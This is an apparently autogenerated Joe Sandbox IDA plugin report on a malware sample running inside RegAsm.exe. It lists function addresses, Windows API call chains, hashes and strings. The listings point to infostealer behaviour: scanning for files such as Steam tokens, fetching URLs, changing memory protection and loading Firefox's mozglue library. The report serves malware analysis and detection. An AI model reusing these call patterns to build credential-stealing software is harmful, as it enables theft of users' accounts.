Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$lstrcpy$lstrlen$CreateObjectSingleThreadWaitlstrcat
String ID: Soft\Steam\steam_tokens.txt
API String ID: 40794102-3507145866
Opcode ID: 916277f7bd73e23a53ab59b86d582b9615f7cfef9cd3b3aa8ba091ba20396997
Instruction ID: 24f7f34573929f25dd8be66f32dc73e0837188d3ff52bcfa25b04edc4c27a69a
Opcode Fuzzy Hash: 916277f7bd73e23a53ab59b86d582b9615f7cfef9cd3b3aa8ba091ba20396997
Instruction Fuzzy Hash: 2A214271C00148EACB05EBE6CD467DDBB78AF18308F50496EE411731D2EB785718C6A6

Uniqueness

Uniqueness Score: -1.00%

Function 00414D5C Relevance: 4.6, APIs: 3, Instructions: 120stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00414D61

Part of subcall function 0040FA35: SHGetFolderPathA.SHELL32(00000000,f;B,00000000,00000000,?), ref: 0040FA66

lstrcat.KERNEL32(?,00000000), ref: 00414DA3
lstrcat.KERNEL32(?), ref: 00414DC2

Part of subcall function 004010A5: _EH_prolog.MSVCRT ref: 004010AA

Part of subcall function 00414B02: _EH_prolog.MSVCRT ref: 00414B07
Part of subcall function 00414B02: wsprintfA.USER32 ref: 00414B26
Part of subcall function 00414B02: FindFirstFileA.KERNEL32(?,?), ref: 00414B3D
Part of subcall function 00414B02: StrCmpCA.SHLWAPI(?,00424708), ref: 00414B5A
Part of subcall function 00414B02: StrCmpCA.SHLWAPI(?,0042470C), ref: 00414B74
Part of subcall function 00414B02: wsprintfA.USER32 ref: 00414B98
Part of subcall function 00414B02: StrCmpCA.SHLWAPI(?,00424386), ref: 00414BA9
Part of subcall function 00414B02: wsprintfA.USER32 ref: 00414BC6
Part of subcall function 00414B02: PathMatchSpecA.SHLWAPI(?,?), ref: 00414BED
Part of subcall function 00414B02: lstrcat.KERNEL32(?,?), ref: 00414C19
Part of subcall function 00414B02: lstrcat.KERNEL32(?,00424724), ref: 00414C2B
Part of subcall function 00414B02: lstrcat.KERNEL32(?,?), ref: 00414C3B
Part of subcall function 00414B02: lstrcat.KERNEL32(?,00424728), ref: 00414C4D
Part of subcall function 00414B02: lstrcat.KERNEL32(?,?), ref: 00414C61

Part of subcall function 00414B02: wsprintfA.USER32 ref: 00414BDA
Part of subcall function 00414B02: FindNextFileA.KERNEL32(00000000,?), ref: 00414D2E
Part of subcall function 00414B02: FindClose.KERNEL32(00000000), ref: 00414D3D

Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$H_prologwsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
String ID:
API String ID: 25485560-0
Opcode ID: b83dd810a9364516fbe2db35aa8a491b8572a4007cd76ff5f79591d12cb4a5af
Instruction ID: 462cb5f0657dd0902482f0bbfda81851e7b8b623cf77e0019db5478fe703fac9
Opcode Fuzzy Hash: b83dd810a9364516fbe2db35aa8a491b8572a4007cd76ff5f79591d12cb4a5af
Instruction Fuzzy Hash: B141B1B1D00209ABCF11EFA1DC43EED7B7DFB48314F40056AF944A21A1EB3997998B95

Uniqueness

Uniqueness Score: -1.00%

Function 6CBC3060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON

Download Yara Rule

APIs

?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6CBC3095

Part of subcall function 6CBC35A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6CC4F688,00001000), ref: 6CBC35D5
Part of subcall function 6CBC35A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6CBC35E0
Part of subcall function 6CBC35A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6CBC35FD
Part of subcall function 6CBC35A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6CBC363F
Part of subcall function 6CBC35A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6CBC369F
Part of subcall function 6CBC35A0: __aulldiv.LIBCMT ref: 6CBC36E4

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CBC309F

Part of subcall function 6CBE5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6CBE56EE,?,00000001), ref: 6CBE5B85
Part of subcall function 6CBE5B50: EnterCriticalSection.KERNEL32(6CC4F688,?,?,?,6CBE56EE,?,00000001), ref: 6CBE5B90
Part of subcall function 6CBE5B50: LeaveCriticalSection.KERNEL32(6CC4F688,?,?,?,6CBE56EE,?,00000001), ref: 6CBE5BD8
Part of subcall function 6CBE5B50: GetTickCount64.KERNEL32 ref: 6CBE5BE4

?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6CBC30BE

Part of subcall function 6CBC30F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6CBC3127
Part of subcall function 6CBC30F0: __aulldiv.LIBCMT ref: 6CBC3140

Part of subcall function 6CBFAB2A: __onexit.LIBCMT ref: 6CBFAB30

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
String ID:
API String ID: 4291168024-0
Opcode ID: 3fe1038523af2e1a0102e4ee089b6ddb36372826f143a9633a238bd83a8eadb4
Instruction ID: 6de1f7c9ff889d7946fb6c591e58307ab50499c291177bcde20cea8f0cf721c4
Opcode Fuzzy Hash: 3fe1038523af2e1a0102e4ee089b6ddb36372826f143a9633a238bd83a8eadb4
Instruction Fuzzy Hash: C3F0F922E207849ACB10FF7498415EAB374AF6B21CF50D319E89853611FB20A1DD8386

Uniqueness

Uniqueness Score: -1.00%

Function 0040FD15 Relevance: 4.5, APIs: 3, Instructions: 28COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,004132F7), ref: 0040FD2D
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 0040FD48
CloseHandle.KERNEL32(00000000), ref: 0040FD4F

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: a1be9c292a21e3b36d8d3b7a294f7bc33be883066089ef5cbd375d07314a2212
Instruction ID: a18e71a4dd7870f1d49f2e211ea1a3ceb5d655b4dbad758c60889a72c4aa7de9
Opcode Fuzzy Hash: a1be9c292a21e3b36d8d3b7a294f7bc33be883066089ef5cbd375d07314a2212
Instruction Fuzzy Hash: C1F03076901218BBDB21AB50DC09FDA3B69AF04755F004461FA45A61D0DBB4AA848BD4

Uniqueness

Uniqueness Score: -1.00%

Function 00410AA3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 514COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00410AA8

Part of subcall function 0040E580: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E5AA

Part of subcall function 0040E685: _EH_prolog.MSVCRT ref: 0040E68A
Part of subcall function 0040E685: lstrcpy.KERNEL32(00000000), ref: 0040E6D6
Part of subcall function 0040E685: lstrcat.KERNEL32(?,?), ref: 0040E6E0

Part of subcall function 0040E6F9: _EH_prolog.MSVCRT ref: 0040E6FE
Part of subcall function 0040E6F9: lstrlen.KERNEL32(?,?,?,?,?,004156A9,?,?,00424818,?,00000000,004243BE), ref: 0040E726
Part of subcall function 0040E6F9: lstrcpy.KERNEL32(00000000), ref: 0040E74D
Part of subcall function 0040E6F9: lstrcat.KERNEL32(?,?), ref: 0040E758

Part of subcall function 0040E63E: lstrcpy.KERNEL32(00000000,?), ref: 0040E677

Part of subcall function 0040E5B7: lstrcpy.KERNEL32(00000000,GPA), ref: 0040E5DD

Part of subcall function 004010A5: _EH_prolog.MSVCRT ref: 004010AA

Part of subcall function 004051CC: _EH_prolog.MSVCRT ref: 004051D1
Part of subcall function 004051CC: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405220
Part of subcall function 004051CC: StrCmpCA.SHLWAPI(?), ref: 0040523A
Part of subcall function 004051CC: InternetOpenUrlA.WININET(?,00000000,00000000,00000000,-00800100,00000000), ref: 0040525E
Part of subcall function 004051CC: CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 0040527F
Part of subcall function 004051CC: InternetReadFile.WININET(00000000,?,00000400,?), ref: 004052CA
Part of subcall function 004051CC: CloseHandle.KERNEL32(?,?,00000400), ref: 004052E4
Part of subcall function 004051CC: InternetCloseHandle.WININET(00000000), ref: 004052EB
Part of subcall function 004051CC: InternetCloseHandle.WININET(?), ref: 004052F4

Part of subcall function 004051CC: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004052A6

Strings

3, xrefs: 00411147

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologInternetlstrcpy$CloseFileHandle$Openlstrcat$CreateReadWritelstrlen
String ID: 3
API String ID: 1244342732-1842515611
Opcode ID: 8c486da19f225c65a79977964eebbe0f3b7b5325b1fabedea7cb2b4400d98bf8
Instruction ID: c32ba2858f258bf3bb61ae01e984c317e144a481bc8e927dd743ac40b1be5afe
Opcode Fuzzy Hash: 8c486da19f225c65a79977964eebbe0f3b7b5325b1fabedea7cb2b4400d98bf8
Instruction Fuzzy Hash: B0327030C04288EADB05E7E6C955BDDBBB45F29308F5048AEE445732C2EF791B18DB66

Uniqueness

Uniqueness Score: -1.00%

Function 0040AB3E Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 155COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040AB43

Part of subcall function 0040E580: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E5AA

Part of subcall function 0040FA35: SHGetFolderPathA.SHELL32(00000000,f;B,00000000,00000000,?), ref: 0040FA66

Part of subcall function 0040E685: _EH_prolog.MSVCRT ref: 0040E68A
Part of subcall function 0040E685: lstrcpy.KERNEL32(00000000), ref: 0040E6D6
Part of subcall function 0040E685: lstrcat.KERNEL32(?,?), ref: 0040E6E0

Part of subcall function 0040E63E: lstrcpy.KERNEL32(00000000,?), ref: 0040E677

Part of subcall function 0040E6F9: _EH_prolog.MSVCRT ref: 0040E6FE
Part of subcall function 0040E6F9: lstrlen.KERNEL32(?,?,?,?,?,004156A9,?,?,00424818,?,00000000,004243BE), ref: 0040E726
Part of subcall function 0040E6F9: lstrcpy.KERNEL32(00000000), ref: 0040E74D
Part of subcall function 0040E6F9: lstrcat.KERNEL32(?,?), ref: 0040E758

Part of subcall function 0040E5B7: lstrcpy.KERNEL32(00000000,GPA), ref: 0040E5DD

Part of subcall function 0040F9F1: _EH_prolog.MSVCRT ref: 0040F9F6
Part of subcall function 0040F9F1: GetFileAttributesA.KERNEL32(00000000,?,0040D3CF,?,?,?,?), ref: 0040FA0A

Part of subcall function 004010A5: _EH_prolog.MSVCRT ref: 004010AA

Part of subcall function 00410AA3: _EH_prolog.MSVCRT ref: 00410AA8

Part of subcall function 004068CC: _EH_prolog.MSVCRT ref: 004068D1
Part of subcall function 004068CC: GetEnvironmentVariableA.KERNEL32(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,00000000,?), ref: 004068F1
Part of subcall function 004068CC: SetEnvironmentVariableA.KERNEL32(00000000,00000000,?,?,?,00423A8C,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00423A87), ref: 00406969
Part of subcall function 004068CC: LoadLibraryA.KERNEL32 ref: 00406980

Part of subcall function 0040970D: _EH_prolog.MSVCRT ref: 00409712
Part of subcall function 0040970D: FindFirstFileA.KERNEL32(00000000,?,00000000,?,00423CE8,?,?,00423AE7,00000000), ref: 0040978F
Part of subcall function 0040970D: StrCmpCA.SHLWAPI(?,00423CEC), ref: 004097AC
Part of subcall function 0040970D: StrCmpCA.SHLWAPI(?,00423CF0), ref: 004097C6
Part of subcall function 0040970D: StrCmpCA.SHLWAPI(?,00000000,?,?,?,00423CF4,?,?,00423AEA), ref: 0040985D

Strings

\..\, xrefs: 0040AC09

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$lstrcpy$EnvironmentFileVariablelstrcat$AttributesFindFirstFolderLibraryLoadPathlstrlen
String ID: \..\
API String ID: 1701172651-4220915743
Opcode ID: 7f795ba0587c5c250ac04c9c4f29f9028bf64d9e3d815e6b8b6f89d1b262f8f5
Instruction ID: de1799ec2468f2602cff296b1f634fa00bfe96c0e6615ae3ef595513e28a817f
Opcode Fuzzy Hash: 7f795ba0587c5c250ac04c9c4f29f9028bf64d9e3d815e6b8b6f89d1b262f8f5
Instruction Fuzzy Hash: 61518070C00288EADB05EBE6D9067DDBBB46F28308F54496EE845732C2EB785718C666

Uniqueness

Uniqueness Score: -1.00%

Function 00406180 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,00000002,00000002,?,00000000,?,?,004062AF), ref: 004061FF

Strings

, xrefs: 004061D2

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-3916222277
Opcode ID: a9ca3820c71c3eda37ba079eb7877add819211e6f4f865b059153334e2d250ef
Instruction ID: 1c892984225ca687d269746aa3563b4b01a644e3aa4f448d2164c566147b4ab8
Opcode Fuzzy Hash: a9ca3820c71c3eda37ba079eb7877add819211e6f4f865b059153334e2d250ef
Instruction Fuzzy Hash: F011BF71104509EADB20CF94CA847AAB3E4FB00340F12486AD543EA2C2C738DA66DB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040FA35 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,f;B,00000000,00000000,?), ref: 0040FA66

Part of subcall function 0040E580: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E5AA

Strings

f;B, xrefs: 0040FA62

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID: f;B
API String ID: 1699248803-393978116
Opcode ID: 37800fc5a78b8b6d42ef66c3396ddb63f1d88b120eaceee914bb511c1f73b206
Instruction ID: 3b2a366e339c6a5745638e352a2310e2b5ad4fc59cf1c1d5fe0187ed78c5db55
Opcode Fuzzy Hash: 37800fc5a78b8b6d42ef66c3396ddb63f1d88b120eaceee914bb511c1f73b206
Instruction Fuzzy Hash: B1F01C7590014CBBDB11DF64C8909EEB7FDEBC4704F1085A6A905A3280E6309F469B50

Uniqueness

Uniqueness Score: -1.00%

Function 0040F218 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetCurrentHwProfileA.ADVAPI32(?), ref: 0040F229

Strings

Unknown, xrefs: 0040F23C

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CurrentProfile
String ID: Unknown
API String ID: 2104809126-1654365787
Opcode ID: bfde118a07128561538445f964f2fcc111f8947dec5ccb60162bc57d517e3c0c
Instruction ID: ec0dc782fcef23dcfed44453182ee0d47b2473d307a9cf0f881379d0322fe311
Opcode Fuzzy Hash: bfde118a07128561538445f964f2fcc111f8947dec5ccb60162bc57d517e3c0c
Instruction Fuzzy Hash: 60E08630600108ABDF10DB90E845B9937AC6B04348F504439E401F21C1DA74E54D8B95

Uniqueness

Uniqueness Score: -1.00%

Function 0040F9F1 Relevance: 3.0, APIs: 2, Instructions: 23COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040F9F6
GetFileAttributesA.KERNEL32(00000000,?,0040D3CF,?,?,?,?), ref: 0040FA0A

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AttributesFileH_prolog
String ID:
API String ID: 3244726999-0
Opcode ID: 6b75abf842dfdc6c2eb2ff13f3cd63bc79bb962a731bd817ef8ea4091a839a93
Instruction ID: 054a0245128961d3b224f33393e34c4b2ab414d4aa21e6c7558ab83bc1edc0ca
Opcode Fuzzy Hash: 6b75abf842dfdc6c2eb2ff13f3cd63bc79bb962a731bd817ef8ea4091a839a93
Instruction Fuzzy Hash: ECE09230A01514EBCB289F65E8416DC7724EF40764F11873BFC66F26D0D73C8A06CA88

Uniqueness

Uniqueness Score: -1.00%

Function 00405E6A Relevance: 2.6, APIs: 2, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,00000000,00003000,00000040,?,00000000,?,?,0040626C,00000000,00000000), ref: 00405EC9
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040,?,00000000,?,?,0040626C,00000000,00000000), ref: 00405EF5

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 13952f3c5282676e9fff2e4139e34abb68a3afbd7b4b0673f58908b5c203bd9e
Instruction ID: 4b53518b9cb7b3bb2fece1673b20d3a6ab7b1c305422158b30a5f1b55b15f669
Opcode Fuzzy Hash: 13952f3c5282676e9fff2e4139e34abb68a3afbd7b4b0673f58908b5c203bd9e
Instruction Fuzzy Hash: BE219371600B059BC724CFB4CD85BABB7F5EB80714F14482EE65AD72D0D279AA40CA58

Uniqueness

Uniqueness Score: -1.00%

Function 0040CD16 Relevance: 1.7, APIs: 1, Instructions: 223COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040CD1B

Part of subcall function 0040E580: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E5AA

Part of subcall function 0040FA35: SHGetFolderPathA.SHELL32(00000000,f;B,00000000,00000000,?), ref: 0040FA66

Part of subcall function 0040E685: _EH_prolog.MSVCRT ref: 0040E68A
Part of subcall function 0040E685: lstrcpy.KERNEL32(00000000), ref: 0040E6D6
Part of subcall function 0040E685: lstrcat.KERNEL32(?,?), ref: 0040E6E0

Part of subcall function 0040E63E: lstrcpy.KERNEL32(00000000,?), ref: 0040E677

Part of subcall function 0040E6F9: _EH_prolog.MSVCRT ref: 0040E6FE
Part of subcall function 0040E6F9: lstrlen.KERNEL32(?,?,?,?,?,004156A9,?,?,00424818,?,00000000,004243BE), ref: 0040E726
Part of subcall function 0040E6F9: lstrcpy.KERNEL32(00000000), ref: 0040E74D
Part of subcall function 0040E6F9: lstrcat.KERNEL32(?,?), ref: 0040E758

Part of subcall function 0040E5B7: lstrcpy.KERNEL32(00000000,GPA), ref: 0040E5DD

Part of subcall function 0040F9F1: _EH_prolog.MSVCRT ref: 0040F9F6
Part of subcall function 0040F9F1: GetFileAttributesA.KERNEL32(00000000,?,0040D3CF,?,?,?,?), ref: 0040FA0A

Part of subcall function 004010A5: _EH_prolog.MSVCRT ref: 004010AA

Part of subcall function 0040BBFC: _EH_prolog.MSVCRT ref: 0040BC01
Part of subcall function 0040BBFC: StrStrA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040BC54
Part of subcall function 0040BBFC: memcmp.MSVCRT ref: 0040BC92

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$lstrcpy$lstrcat$AttributesFileFolderPathlstrlenmemcmp
String ID:
API String ID: 2375657845-0
